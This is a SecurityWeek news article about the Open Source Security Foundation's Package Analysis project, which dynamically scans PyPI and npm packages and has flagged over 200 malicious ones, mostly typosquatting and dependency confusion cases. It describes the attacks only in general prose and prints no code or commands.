Connect with us

Hi, what are you looking for?


Application Security

New OpenSSF Project Hunts for Malicious Packages in Open Source Repositories

The Open Source Security Foundation (OpenSSF) has announced a new project whose goal is to help identify malicious packages in open source repositories.

The Open Source Security Foundation (OpenSSF) has announced a new project whose goal is to help identify malicious packages in open source repositories.

The Package Analysis project, OpenSSF says, aims to identify the behavior and capabilities of open source packages – including files they access, commands they support, and IPs they connect to – and track modifications that could reveal suspicious activities.

“This effort is meant to improve the security of open source software by detecting malicious behavior, informing consumers selecting packages, and providing researchers with data about the ecosystem,” OpenSSF says.

Under development for a while, the project went through extensive changes and only recently became useful, the Foundation says.

Package Analysis dynamically investigates packages in popular open source repositories and places the results in a BigQuery table. The project has already identified more than 200 malicious PyPI and npm packages, but most of these were dependency confusion and typosquatting attacks.

The identified packages typically contained a simple script designed to run at install and send home a small amount of information on the host. However, they could prove far more hurtful to those who installed them.

According to OpenSSF, most of these malicious packages could be the work of security researchers, given that no meaningful data was being exfiltrated and that no attempt was made at disguising the behavior.

Advertisement. Scroll to continue reading.

[ READ: Apache Foundation Calls Out Open-Source Leechers ]

The Foundation calls for involvement in advancing the project, to improve behavioral detection, automate result processing, store packages processed for long-term analysis, and improve reliability.

Google, which has long advocated for a safer open source environment and which is a member of OpenSSF, has already announced support for the project.

“This program contributes to a more secure software supply chain and greater trust in open source software. The program also gives insight into the types of malicious packages that are most common at any given time, which can guide decisions about how to better protect the ecosystem,” Google says.

According to the internet giant, the short time that Package Analysis needed to identify malicious projects shows that more should be invested in vetting packages to keep users safe.

“This is a growing space, and having an open standard for reporting would help centralize analysis results and offer consumers a trusted place to assess the packages they’re considering using. Creating an open standard should also foster healthy competition, promote integration, and raise the overall security of open source packages,” Google concluded.

Related: Meta Releases Open Source Browser Extension for Checking Code Authenticity

Related: U.S. Government, Tech Giants Discuss Open Source Software Security

Related: Open Source Security Foundation Now Counts 60 Members

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

SecurityWeek’s Threat Detection and Incident Response Summit brings together security practitioners from around the world to share war stories on breaches, APT attacks and threat intelligence.


Securityweek’s CISO Forum will address issues and challenges that are top of mind for today’s security leaders and what the future looks like as chief defenders of the enterprise.


Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Risk Management

The supply chain threat is directly linked to attack surface management, but the supply chain must be known and understood before it can be...

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.

Application Security

GitHub this week announced the revocation of three certificates used for the GitHub Desktop and Atom applications.


The overall effect of current global geopolitical conditions is that nation states have a greater incentive to target the ICS/OT of critical industries, while...

Application Security

Drupal released updates that resolve four vulnerabilities in Drupal core and three plugins.

Application Security

A CSRF vulnerability in the source control management (SCM) service Kudu could be exploited to achieve remote code execution in multiple Azure services.

Application Security

While there are many routes to application security, bundles that allow security teams to quickly and easily secure applications and affect security posture in...